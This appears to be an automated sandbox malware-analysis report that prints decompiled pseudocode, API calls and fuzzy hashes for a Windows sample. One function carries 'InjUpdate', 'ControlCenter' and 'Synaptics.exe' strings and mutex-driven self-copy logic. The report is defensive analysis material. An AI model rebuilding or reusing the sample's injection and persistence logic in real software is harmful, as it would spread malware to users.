                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClassLongWindow$InfoRegisterUnregister
                                                    • String ID: 0/B$@$tC
                                                    • API String ID: 717780171-775952512
                                                    • Opcode ID: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                    • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
                                                    • Opcode Fuzzy Hash: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                    • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 72%
                                                    			E00401B60() {
                                                    				void* _t2;
                                                    				void* _t3;
                                                    				void* _t14;
                                                    				intOrPtr* _t19;
                                                    				intOrPtr _t23;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t28;
                                                    
                                                    				_t26 = _t28;
                                                    				if( *0x49e5c4 == 0) {
                                                    					return _t2;
                                                    				} else {
                                                    					_push(_t26);
                                                    					_push(E00401C36);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t28;
                                                    					if( *0x49e04d != 0) {
                                                    						_push(0x49e5cc);
                                                    						L004013F8();
                                                    					}
                                                    					 *0x49e5c4 = 0;
                                                    					_t3 =  *0x49e624; // 0x0
                                                    					LocalFree(_t3);
                                                    					 *0x49e624 = 0;
                                                    					_t19 =  *0x49e5ec; // 0x49e5ec
                                                    					while(_t19 != 0x49e5ec) {
                                                    						_t1 = _t19 + 8; // 0x0
                                                    						VirtualFree( *_t1, 0, 0x8000); // executed
                                                    						_t19 =  *_t19;
                                                    					}
                                                    					E00401460(0x49e5ec);
                                                    					E00401460(0x49e5fc);
                                                    					E00401460(0x49e628);
                                                    					_t14 =  *0x49e5e4; // 0x0
                                                    					while(_t14 != 0) {
                                                    						 *0x49e5e4 =  *_t14;
                                                    						LocalFree(_t14);
                                                    						_t14 =  *0x49e5e4; // 0x0
                                                    					}
                                                    					_pop(_t23);
                                                    					 *[fs:eax] = _t23;
                                                    					_push(0x401c3d);
                                                    					if( *0x49e04d != 0) {
                                                    						_push(0x49e5cc);
                                                    						L00401400();
                                                    					}
                                                    					_push(0x49e5cc);
                                                    					L00401408();
                                                    					return 0;
                                                    				}
                                                    			}

                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(Function_0009E5CC,00000000,00401C36), ref: 00401B8D
                                                    • LocalFree.KERNEL32(00000000,00000000,00401C36), ref: 00401B9F
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BBE
                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BFD
                                                    • RtlLeaveCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C26
                                                    • RtlDeleteCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                    • String ID: (I$I
                                                    • API String ID: 3782394904-2351459270
                                                    • Opcode ID: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                    • Instruction ID: 63aebc4cd3b04fdf267fff4595653c8a60232739778a968a80e4263db5fe1b04
                                                    • Opcode Fuzzy Hash: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                    • Instruction Fuzzy Hash: D111AC706042407EEB21EBA79D55B163BD8A71571CF91407BF004A62F2E67CAC00CB2E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 51%
                                                    			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				intOrPtr _t27;
                                                    				void* _t29;
                                                    				void* _t31;
                                                    				intOrPtr _t32;
                                                    				char _t33;
                                                    				intOrPtr _t38;
                                                    				void* _t39;
                                                    				void* _t48;
                                                    				intOrPtr _t49;
                                                    				intOrPtr _t51;
                                                    				intOrPtr _t53;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t57;
                                                    				intOrPtr _t59;
                                                    				intOrPtr _t61;
                                                    				void* _t62;
                                                    				intOrPtr _t69;
                                                    				intOrPtr _t73;
                                                    				void* _t83;
                                                    				void* _t86;
                                                    				intOrPtr _t92;
                                                    				void* _t97;
                                                    				void* _t98;
                                                    				intOrPtr _t103;
                                                    				intOrPtr _t127;
                                                    
                                                    				_t137 = __fp0;
                                                    				_t124 = __esi;
                                                    				_t123 = __edi;
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_t92 = __eax;
                                                    				_push(_t127);
                                                    				_push(0x49a5ef);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t127;
                                                    				if(__edx == 0) {
                                                    					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
                                                    					__eflags = 0;
                                                    					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
                                                    					L14:
                                                    					_pop(_t103);
                                                    					 *[fs:eax] = _t103;
                                                    					_push(0x49a5f6);
                                                    					return E004049E4( &_v20, 4);
                                                    				}
                                                    				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
                                                    				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
                                                    					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
                                                    				}
                                                    				_t27 =  *((intOrPtr*)(_t92 + 0x308));
                                                    				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
                                                    				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
                                                    				_t29 = E004738BC(0, _t92); // executed
                                                    				_t31 = E00441704(_t92);
                                                    				_t32 =  *0x49d6b8; // 0x0
                                                    				_t97 = _t29; // executed
                                                    				_t33 = E00477AD8(_t32, _t92, _t31, _t123, _t124); // executed
                                                    				 *0x49f149 = _t33;
                                                    				E00402B68(1,  &_v8);
                                                    				E00404DCC(_v8, "InjUpdate");
                                                    				if(0 != 0) {
                                                    					L8:
                                                    					_t38 =  *0x49d6b4; // 0x0, executed
                                                    					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
                                                    					if(_t39 != 0) {
                                                    						E0045A800();
                                                    					} else {
                                                    						E00498684(_t92, _t92, _t123, _t124); // executed
                                                    						E00498F04(_t92, _t123, _t124); // executed
                                                    						_t48 = E00498B40(_t92, _t92, _t123, _t124); // executed
                                                    						if(_t48 == 0) {
                                                    							_t49 =  *0x49f1b0; // 0x0
                                                    							_push(E00409780(_t49, _t97, 1, __eflags));
                                                    							_t51 =  *0x49f1b4; // 0x0
                                                    							_push(E00409780(_t51, _t97, 1, __eflags));
                                                    							_t53 =  *0x49f1b8; // 0x0
                                                    							_push(E00409780(_t53, _t97, 1, __eflags));
                                                    							_t55 =  *0x49f1bc; // 0x0
                                                    							_push(E00409780(_t55, _t97, 1, __eflags));
                                                    							_t57 =  *0x49f1c0; // 0x0
                                                    							_push(E00409780(_t57, _t97, 1, __eflags));
                                                    							_t59 =  *0x49f1a8; // 0x0
                                                    							_push(E00409780(_t59, _t97, 1, __eflags));
                                                    							_t61 =  *0x49f1a4; // 0x0
                                                    							_t62 = E00409780(_t61, _t97, 1, __eflags);
                                                    							_pop(_t98);
                                                    							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137);
                                                    							E00499FAC(_t92, 1);
                                                    						} else {
                                                    							E00498998(_t92, _t92, 1, _t123, _t124); // executed
                                                    						}
                                                    					}
                                                    					goto L14;
                                                    				}
                                                    				_t69 =  *0x49d6b4; // 0x0
                                                    				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
                                                    				_t131 = _t124;
                                                    				if(_t124 == 0) {
                                                    					goto L8;
                                                    				} else {
                                                    					goto L5;
                                                    				}
                                                    				do {
                                                    					L5:
                                                    					CloseHandle(_t124);
                                                    					_t73 =  *0x49d6b4; // 0x0
                                                    					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
                                                    					E004737B0( &_v12);
                                                    					_push( &_v12);
                                                    					E00402B68(0,  &_v20);
                                                    					E00409E18(_v20,  &_v16);
                                                    					_pop(_t83);
                                                    					E00404C88(_t83, _v16);
                                                    					_t86 = E00409A48(_v12, _t131);
                                                    					_t132 = _t86;
                                                    					if(_t86 != 0) {
                                                    						E00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
                                                    					}
                                                    					_t133 = _t124;
                                                    				} while (_t124 != 0);
                                                    				goto L8;
                                                    			}

                                                    APIs
                                                    • OpenMutexA.KERNEL32 ref: 0049A48F
                                                    • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                    • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MutexOpen$CloseHandle
                                                    • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                    • API String ID: 1942958553-1737343353
                                                    • Opcode ID: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                    • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                    • Opcode Fuzzy Hash: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                    • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 94%
                                                    			E004590AC(void* __ecx, char __edx) {
                                                    				char _v5;
                                                    				char _v261;
                                                    				void* __ebx;
                                                    				void* __ebp;
                                                    				intOrPtr _t39;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t43;
                                                    				struct HINSTANCE__** _t53;
                                                    				struct HICON__* _t55;
                                                    				intOrPtr _t58;
                                                    				struct HINSTANCE__** _t60;
                                                    				void* _t67;
                                                    				char* _t69;
                                                    				char* _t75;
                                                    				intOrPtr _t81;
                                                    				intOrPtr* _t88;
                                                    				intOrPtr* _t89;
                                                    				intOrPtr _t90;
                                                    				void* _t91;
                                                    				char _t93;
                                                    				void* _t104;
                                                    				void* _t105;
                                                    
                                                    				_t93 = __edx;
                                                    				_t91 = __ecx;
                                                    				if(__edx != 0) {
                                                    					_t105 = _t105 + 0xfffffff0;
                                                    					_t39 = E00403F10(_t39, _t104);
                                                    				}
                                                    				_v5 = _t93;
                                                    				_t90 = _t39;
                                                    				E00421B3C(_t91, 0);
                                                    				_t42 =  *0x49dabc; // 0x49b520
                                                    				if( *((short*)(_t42 + 2)) == 0) {
                                                    					_t89 =  *0x49dabc; // 0x49b520
                                                    					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                                    					 *_t89 = 0x45a814;
                                                    				}
                                                    				_t43 =  *0x49dc10; // 0x49b528
                                                    				if( *((short*)(_t43 + 2)) == 0) {
                                                    					_t88 =  *0x49dc10; // 0x49b528
                                                    					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                                    					 *_t88 = E0045AA0C;
                                                    				}
                                                    				 *((char*)(_t90 + 0x34)) = 0;
                                                    				 *((intOrPtr*)(_t90 + 0x90)) = E00403BBC(1);
                                                    				 *((intOrPtr*)(_t90 + 0xa8)) = E00403BBC(1);
                                                    				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                                    				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                                    				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
                                                    				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                                    				 *((char*)(_t90 + 0x7c)) = 1;
                                                    				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                                    				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                                    				 *((char*)(_t90 + 0x88)) = 0;
                                                    				 *((char*)(_t90 + 0x9d)) = 1;
                                                    				 *((char*)(_t90 + 0xb4)) = 1;
                                                    				_t103 = E0042B3F8(1);
                                                    				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                                    				_t53 =  *0x49d93c; // 0x49e030
                                                    				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                                    				E0042B7C8(_t103, _t55);
                                                    				_t20 = _t90 + 0x98; // 0x736d
                                                    				_t58 =  *_t20;
                                                    				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                                    				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
                                                    				_t60 =  *0x49d93c; // 0x49e030
                                                    				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                                    				OemToCharA( &_v261,  &_v261);
                                                    				_t67 = E0040E020(0x5c);
                                                    				if(_t67 != 0) {
                                                    					_t27 = _t67 + 1; // 0x1
                                                    					E00409FC4( &_v261, _t27);
                                                    				}
                                                    				_t69 = E0040E048( &_v261, 0x2e);
                                                    				if(_t69 != 0) {
                                                    					 *_t69 = 0;
                                                    				}
                                                    				CharLowerA( &(( &_v261)[1]));
                                                    				_t31 = _t90 + 0x8c; // 0x45150c
                                                    				E00404C30(_t31, 0x100,  &_v261);
                                                    				_t75 =  *0x49d6e4; // 0x49e038
                                                    				if( *_t75 == 0) {
                                                    					E004593B4(_t90, _t90, 0x100); // executed
                                                    				}
                                                    				 *((char*)(_t90 + 0x59)) = 1;
                                                    				 *((char*)(_t90 + 0x5a)) = 1;
                                                    				 *((char*)(_t90 + 0x5b)) = 1;
                                                    				 *((char*)(_t90 + 0x9e)) = 1;
                                                    				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                                    				E0045B188(_t90, 0x100);
                                                    				E0045BB4C(_t90);
                                                    				_t81 = _t90;
                                                    				if(_v5 != 0) {
                                                    					E00403F68(_t81);
                                                    					_pop( *[fs:0x0]);
                                                    				}
                                                    				return _t90;
                                                    			}

                                                    APIs
                                                    • LoadIconA.USER32 ref: 00459191
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                    • OemToCharA.USER32 ref: 004591D6
                                                    • CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000), ref: 00459216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                    • String ID: 0I$8I$MAINICON
                                                    • API String ID: 3935243913-3756263232
                                                    • Opcode ID: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                    • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                    • Opcode Fuzzy Hash: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                    • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (graph image not captured; basic blocks 401a9c-401b51; legend: Executed / Not Executed)
                                                    C-Code - Quality: 68%
                                                    			E00401A9C() {
                                                    				void* _t11;
                                                    				signed int _t13;
                                                    				intOrPtr _t19;
                                                    				void* _t20;
                                                    				intOrPtr _t23;
                                                    
                                                    				_push(_t23);
                                                    				_push("��'");
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t23;
                                                    				_push(0x49e5cc);
                                                    				L004013F0();
                                                    				if( *0x49e04d != 0) {
                                                    					_push(0x49e5cc);
                                                    					L004013F8();
                                                    				}
                                                    				E00401460(0x49e5ec);
                                                    				E00401460(0x49e5fc);
                                                    				E00401460(0x49e628);
                                                    				_t11 = LocalAlloc(0, 0xff8); // executed
                                                    				 *0x49e624 = _t11;
                                                    				if( *0x49e624 != 0) {
                                                    					_t13 = 3;
                                                    					do {
                                                    						_t20 =  *0x49e624; // 0x0
                                                    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                    						_t13 = _t13 + 1;
                                                    					} while (_t13 != 0x401);
                                                    					 *((intOrPtr*)(0x49e610)) = 0x49e60c;
                                                    					 *0x49e60c = 0x49e60c;
                                                    					 *0x49e618 = 0x49e60c;
                                                    					 *0x49e5c4 = 1;
                                                    				}
                                                    				_pop(_t19);
                                                    				 *[fs:eax] = _t19;
                                                    				_push(E00401B59);
                                                    				if( *0x49e04d != 0) {
                                                    					_push(0x49e5cc);
                                                    					L00401400();
                                                    					return 0;
                                                    				}
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                    • RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                    • String ID: (I$'$I
                                                    • API String ID: 730355536-3463978989
                                                    • Opcode ID: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                    • Instruction ID: dfc13510ffc652cdc4745fa131ecd9d2d70f716ade9f6bddb0b8d8da957d249b
                                                    • Opcode Fuzzy Hash: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                    • Instruction Fuzzy Hash: E201AD70204240AEE716EB6B9816B153BD4D76970CF85807FF000A77F2E6BC6840CA1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (graph image not captured; basic blocks 434530-4345d7; legend: Executed / Not Executed)
                                                    C-Code - Quality: 86%
                                                    			E00434530(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
                                                    				struct tagTEXTMETRICA _v112;
                                                    				void* __ebx;
                                                    				void* _t14;
                                                    				char* _t18;
                                                    				signed int _t19;
                                                    				signed int _t21;
                                                    				struct HDC__* _t27;
                                                    				signed int _t28;
                                                    				signed int _t30;
                                                    				signed int _t31;
                                                    				void* _t32;
                                                    				struct HDC__* _t38;
                                                    				struct tagTEXTMETRICA* _t40;
                                                    
                                                    				_t40 =  &_v112;
                                                    				_t38 = __eax;
                                                    				_push(0);
                                                    				L00407638();
                                                    				_t27 = __eax;
                                                    				GetTextMetricsA(__eax, _t40);
                                                    				_t14 = SelectObject(_t27, E00424E24( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
                                                    				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth)); // executed
                                                    				SelectObject(_t27, _t14);
                                                    				_push(_t27);
                                                    				_push(0);
                                                    				L00407888();
                                                    				_t18 =  *0x49da40; // 0x49eb1c
                                                    				if( *_t18 == 0) {
                                                    					_t28 = _t40->tmHeight;
                                                    					_t19 = _v112.tmHeight;
                                                    					if(_t28 > _t19) {
                                                    						_t28 = _t19;
                                                    					}
                                                    					_t21 = GetSystemMetrics(6) << 2;
                                                    					if(_t28 < 0) {
                                                    						_t28 = _t28 + 3;
                                                    					}
                                                    					_t30 = _t21 + (_t28 >> 2);
                                                    				} else {
                                                    					if( *((char*)(_t38 + 0x1a5)) == 0) {
                                                    						_t31 = 6;
                                                    					} else {
                                                    						_t31 = 8;
                                                    					}
                                                    					_t30 = GetSystemMetrics(6) * _t31;
                                                    				}
                                                    				return E0043A75C(_t38, _v112 + _t30);
                                                    			}

                                                    APIs
                                                    • 733AAC50.USER32(00000000), ref: 0043453A
                                                    • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                      • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                    • 733AB380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043456E
                                                    • GetSystemMetrics.USER32 ref: 00434594
                                                    • GetSystemMetrics.USER32 ref: 004345AE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
                                                    • String ID:
                                                    • API String ID: 3751190600-0
                                                    • Opcode ID: 672c33895bb715ed287ccc6b5b5e89221a61783e3b8e8c8f3592199200a14ee8
                                                    • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                    • Opcode Fuzzy Hash: 672c33895bb715ed287ccc6b5b5e89221a61783e3b8e8c8f3592199200a14ee8
                                                    • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 53%
                                                    			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				intOrPtr _v16;
                                                    				char _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				signed short* _v36;
                                                    				char _v40;
                                                    				char _v44;
                                                    				char _v48;
                                                    				char _v52;
                                                    				signed int _v56;
                                                    				char _v60;
                                                    				signed int _v64;
                                                    				intOrPtr _t52;
                                                    				void* _t65;
                                                    				intOrPtr _t71;
                                                    				intOrPtr _t76;
                                                    				void* _t93;
                                                    				intOrPtr _t101;
                                                    				intOrPtr _t103;
                                                    				void* _t109;
                                                    				void* _t110;
                                                    				intOrPtr _t111;
                                                    
                                                    				_t109 = _t110;
                                                    				_t111 = _t110 + 0xffffffc4;
                                                    				_v40 = 0;
                                                    				_t93 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t109);
                                                    				_push(0x474ab3);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t111;
                                                    				E004049C0(__ecx);
                                                    				_v32 = 0xff;
                                                    				_push( &_v28);
                                                    				_t52 = E00404ED8( &_v8);
                                                    				_push(_t52); // executed
                                                    				L004072A8(); // executed
                                                    				_v24 = _t52;
                                                    				if(_v24 == 0) {
                                                    					_pop(_t101);
                                                    					 *[fs:eax] = _t101;
                                                    					_push(0x474aba);
                                                    					E004049C0( &_v40);
                                                    					return E004049E4( &_v12, 2);
                                                    				} else {
                                                    					_v16 = E0040275C(_v24);
                                                    					_push(_t109);
                                                    					_push(0x474a89);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t111;
                                                    					_push(_v16);
                                                    					_push(_v24);
                                                    					_push(_v28);
                                                    					_t65 = E00404ED8( &_v8);
                                                    					_push(_t65); // executed
                                                    					L004072A0(); // executed
                                                    					if(_t65 != 0) {
                                                    						_push( &_v32);
                                                    						_push( &_v36);
                                                    						_push("\\VarFileInfo\\Translation");
                                                    						_t71 = _v16;
                                                    						_push(_t71);
                                                    						L004072B0();
                                                    						if(_t71 != 0) {
                                                    							_v64 =  *_v36 & 0x0000ffff;
                                                    							_v60 = 0;
                                                    							_v56 = E004079DC( *_v36) & 0x0000ffff;
                                                    							_v52 = 0;
                                                    							_v48 = _v12;
                                                    							_v44 = 0xb;
                                                    							E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
                                                    							E00404A58( &_v12, _v40);
                                                    						}
                                                    						_push( &_v32);
                                                    						_push( &_v20);
                                                    						_push(E00404ED8( &_v12));
                                                    						_t76 = _v16;
                                                    						_push(_t76);
                                                    						L004072B0();
                                                    						if(_t76 != 0) {
                                                    							E0040A174(_v20, _t93);
                                                    						}
                                                    					}
                                                    					_pop(_t103);
                                                    					 *[fs:eax] = _t103;
                                                    					_push(0x474a90);
                                                    					return E0040277C(_v16);
                                                    				}
                                                    			}

                                                    Instruction addresses: 0x00474949 0x0047494b 0x00474951 0x00474954 0x00474956 0x00474959 0x0047495f 0x00474967 0x0047496e 0x0047496f 0x00474974 0x00474977 0x0047497c 0x00474981 0x0047498b 0x0047498f 0x00474994 0x00474995 0x0047499a 0x004749a1 0x00474a92 0x00474a95 0x00474a98 0x00474aa0 0x00474ab2 0x004749a7 0x004749af 0x004749b4 0x004749b5 0x004749ba 0x004749bd 0x004749c3 0x004749c7 0x004749cb 0x004749cf 0x004749d4 0x004749d5 0x004749dc 0x004749e5 0x004749e9 0x004749ea 0x004749ef 0x004749f2 0x004749f3 0x004749fa 0x00474a06 0x00474a09 0x00474a1a 0x00474a1d 0x00474a24 0x00474a27 0x00474a38 0x00474a43 0x00474a43 0x00474a4b 0x00474a4f 0x00474a58 0x00474a59 0x00474a5c 0x00474a5d 0x00474a64 0x00474a6b 0x00474a6b 0x00474a64 0x00474a72 0x00474a75 0x00474a78 0x00474a88 0x00474a88

                                                    APIs
                                                    • 73E714E0.VERSION(00000000,?,00000000,00474AB3), ref: 00474995
                                                    • 73E714C0.VERSION(00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749D5
                                                    • 73E71500.VERSION(?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
                                                    • 73E71500.VERSION(?,00000000,?,000000FF,?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000), ref: 00474A5D
                                                    Strings
                                                    • \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
                                                    • \VarFileInfo\Translation, xrefs: 004749EA
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
